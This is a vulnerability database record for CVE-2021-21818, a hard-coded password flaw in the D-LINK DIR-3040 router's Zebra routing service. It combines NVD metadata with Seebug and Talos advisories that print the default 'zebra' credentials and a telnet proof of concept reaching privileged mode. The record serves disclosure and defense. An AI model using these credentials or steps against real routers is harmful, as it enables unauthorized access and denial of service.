A hard-coded password vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of requests to trigger this vulnerability.
{"id": "CVE-2021-21818", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-21818", "description": "A hard-coded password vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of requests to trigger this vulnerability.", "published": "2021-07-16T11:15:00", "modified": "2022-04-28T17:15:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21818", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283"], "cvelist": ["CVE-2021-21818"], "immutableFields": [], "lastseen": "2022-04-28T19:32:43", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:99311"]}, {"type": "talos", "idList": ["TALOS-2021-1283"]}], "rev": 4}, "score": {"value": 3.3, "vector": "NONE"}, "twitter": {"counter": 4, "tweets": [{"link": 
"https://twitter.com/hasdid/status/1418054954867208194", "text": "/hashtag/SANSNewsBites?src=hashtag_click /hashtag/CyberSecurity?src=hashtag_click /hashtag/Automated?src=hashtag_click | DIR-3040 :: Rev. Ax :: FW v1.13B03 :: CVE-2021-21816 / CVE-2021-21817 / CVE-2021-21818 / CVE-2021-21819 / CVE-2021-21820 -Multiple Vulnerabilities https://t.co/ewq6PEwkfC?amp=1"}, {"link": "https://twitter.com/ehsantarrar1/status/1416950108382498816", "text": "D-LINK 1/2\nMultiple vulnerabilities (CVE-2021-21816, CVE-2021-21817, CVE-2021-21818, CVE-2021-21820) have been found in the D-LINK DIR-3040 wireless router. These vulnerabilities could allow an attacker to carry out a variety of malicious actions."}, {"link": "https://twitter.com/ehsantarrar1/status/1416950108382498816", "text": "D-LINK 1/2\nMultiple vulnerabilities (CVE-2021-21816, CVE-2021-21817, CVE-2021-21818, CVE-2021-21820) have been found in the D-LINK DIR-3040 wireless router. These vulnerabilities could allow an attacker to carry out a variety of malicious actions."}, {"link": "https://twitter.com/TWCERTCC/status/1419594535085117440", "text": "DIR-3040 :: Rev. 
Ax :: FW v1.13B03 :: CVE-2021-21816 / CVE-2021-21817 / CVE-2021-21818 / CVE-2021-21819 / CVE-2021-21820 -Multiple Vulnerabilities\nhttps://t.co/tLBw2PKBDc?amp=1\n------\nMajor domestic networking product manufacturer fixes router hard-coded password and multiple critical RCE vulnerabilities\nview more: https://t.co/wqt7ryAayR?amp=1"}], "modified": "2021-07-23T07:50:01"}, "backreferences": {"references": [{"type": "seebug", "idList": ["SSV:99311"]}, {"type": "talos", "idList": ["TALOS-2021-1283"]}]}, "exploitation": null, "vulnersScore": 3.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "score": 7.5}}}, "cpe": ["cpe:/o:dlink:dir-3040_firmware:1.13b03"], "cpe23": ["cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*"], "cwe": ["CWE-798"], "affectedSoftware": [{"cpeName": "dlink:dir-3040_firmware", "version": "1.13b03", "operator": "eq", "name": "dlink dir-3040 firmware"}], "affectedConfiguration": [{"name": "dlink dir-3040", "cpeName": "dlink:dir-3040", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dlink:dir-3040:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283", "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1283", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"seebug": [{"lastseen": "2021-07-24T08:24:55", "description": "The DIR-3040 is an AC3000-based wireless internet router.\n\nZebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.\n\nThe DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password zebra:\n\n```\nadmin@dlinkrouter:~# cat /tmp/zebra.conf \nhostname Router\npassword zebra\nenable password zebra\n```\n\nExploit Proof of Concept\n\n```\n$ telnet 192.168.100.1 2601 \nTrying 192.168.100.1...\n Connected to 192.168.100.1.\n Escape character is '^]'.\n \n Hello, this is Quagga (version 1.1.1).\n Copyright 1996-2005 Kunihiro Ishiguro, et al.\n \n \n User Access Verification\n \n Password: \n Router> \n echo Echo a message back to the vty\n enable Turn on privileged mode command\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n Router> enable\n Password: \n Router# \n clear Clear stored data\n configure Configuration from vty interface\n copy Copy configuration\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n echo Echo a message back to the vty\n enable Turn on privileged mode command\n end End current mode and change to enable mode.\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n logmsg Send a message to enabled logging destinations\n no Negate a command or set its defaults\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n 
write Write running configuration to memory, network, or terminal\n```", "published": "2021-07-22T00:00:00", "type": "seebug", "title": "D-LINK DIR-3040 service component uses default password (CVE-2021-21818)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21818"], "modified": "2021-07-22T00:00:00", "id": "SSV:99311", "href": "https://www.seebug.org/vuldb/ssvid-99311", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": ""}], "talos": [{"lastseen": "2022-07-06T16:04:30", "description": "# Talos Vulnerability Report\n\n### TALOS-2021-1283\n\n## D-LINK DIR-3040 Syslog information disclosure vulnerability\n\n##### July 15, 2021\n\n##### CVE Number\n\nCVE-2021-21818\n\n## Summary\n\nA hard-coded password vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to a denial of service. An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nD-LINK DIR-3040 1.13B03\n\n### Product URLs\n\n<https://us.dlink.com/en/products/dir-3040-smart-ac3000-high-power-wi-fi-tri-band-gigabit-router>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-259 - Use of Hard-coded Password\n\n### Details\n\nThe DIR-3040 is an AC3000-based wireless internet router.\n\nZebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.\n\nThe DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. 
This service also uses a configuration file containing a hard-coded password `zebra`:\n \n \n admin@dlinkrouter:~# cat /tmp/zebra.conf \n hostname Router\n password zebra\n enable password zebra\n \n\n### Exploit Proof of Concept\n \n \n $ telnet 192.168.100.1 2601 \n Trying 192.168.100.1...\n Connected to 192.168.100.1.\n Escape character is '^]'.\n \n Hello, this is Quagga (version 1.1.1).\n Copyright 1996-2005 Kunihiro Ishiguro, et al.\n \n \n User Access Verification\n \n Password: \n Router> \n echo Echo a message back to the vty\n enable Turn on privileged mode command\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n Router> enable\n Password: \n Router# \n clear Clear stored data\n configure Configuration from vty interface\n copy Copy configuration\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n echo Echo a message back to the vty\n enable Turn on privileged mode command\n end End current mode and change to enable mode.\n exit Exit current mode and down to previous mode\n help Description of the interactive help system\n list Print command list\n logmsg Send a message to enabled logging destinations\n no Negate a command or set its defaults\n quit Exit current mode and down to previous mode\n show Show running system information\n terminal Set terminal line parameters\n who Display who is on vty\n write Write running configuration to memory, network, or terminal\n \n\n### Timeline\n\n2021-04-28 - Vendor disclosure \n2021-05-12 - Vendor acknowledged \n2021-06-08 - Vendor provided patch for Talos to test \n2021-06-09 - Talos provided feedback on patch \n2021-06-23 - Talos follow up with vendor \n2021-07-13 - Vendor patched \n2021-07-15 - Public Release\n\n##### 
Credit\n\nDiscovered by Dave McDaniel of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2021-1345\n\nPrevious Report\n\nTALOS-2021-1274\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-15T00:00:00", "type": "talos", "title": "D-LINK DIR-3040 Syslog information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21818"], "modified": "2021-07-15T00:00:00", "id": "TALOS-2021-1283", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}